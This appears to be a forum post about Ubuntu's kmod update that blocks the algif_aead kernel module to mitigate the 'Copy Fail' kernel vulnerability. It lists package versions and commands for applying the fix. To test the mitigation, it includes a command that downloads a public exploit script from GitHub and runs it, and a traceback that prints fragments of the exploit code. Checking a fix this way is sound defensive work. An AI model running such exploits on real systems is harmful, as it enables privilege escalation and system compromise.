While the website may be down, the security email list continues to work apparently and they have emaied about a mitigation there on 30.04.2026 18:06 CET.
The issue should be mitigated for now thanks to USN-8226-1 and USN-8226-2. It more or less applies the same mitigations suggested by the researchers, but right in kmod and through an update, the upside being that the kernel module will probably be reactivated when the issue has been fully patched, without any manual intervention besides needing to apply updates.
The description of this USN reads:
kmod has been updated to block loading of the algif_aead kernel module.
It suggest the following updates:
Ubuntu 25.10 kmod 34.2-2ubuntu1.1
Ubuntu 24.04 LTS kmod
31+20240202-2ubuntu7.2Ubuntu 22.04 LTS kmod 29-1ubuntu1.1
Ubuntu 20.04 LTS kmod 27-1ubuntu2.1+esm1 Available with Ubuntu Pro
Ubuntu 18.04 LTS kmod 24-1ubuntu3.5+esm1 Available with Ubuntu Pro
Ubuntu 16.04 LTS kmod 22-1ubuntu5.2+esm1 Available with Ubuntu Pro
Ubuntu 14.04 LTS kmod 15-0ubuntu7+esm1 Available with Ubuntu Pro
This mitigation can be applied using:
sudo apt update && sudo apt install kmod
sudo rmmod algif_aead
The mitigation works effectively and without a reboot (given that the module wasn't loaded at all or rmmod was used like suggested above), though a reboot is probably recommended:
wget https://github.com/theori-io/copy-fail-CVE-2026-31431/raw/main/copy_fail_exp.py -O /tmp/copy_fail_exp.py
python3 /tmp/copy_fail_exp.py
Result:
Traceback (most recent call last):
File "/tmp/copy_fail_exp.py", line 9, in <module>
while i<len(e):c(f,i,e[i:i+4]);i+=4
^^^^^^^^^^^^^^^
File "/tmp/copy_fail_exp.py", line 5, in c
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=2
79;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accep
t();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\
x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno()
,o)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory
It looks like binding to an aead socket was successfully prevented.
They link the following blog and notices (may be not reachable now, but for future reference):
- https://ubuntu.com/blog/copy-fail-vulnerability-fixes-available
- https://ubuntu.com/security/notices/USN-8226-1
- https://ubuntu.com/security/notices/USN-8226-2
Kernel patches will probably become available in the near future as well, but due to the current state of the websites it is rather hard to get up-to-date information and I've yet to receive an email about it.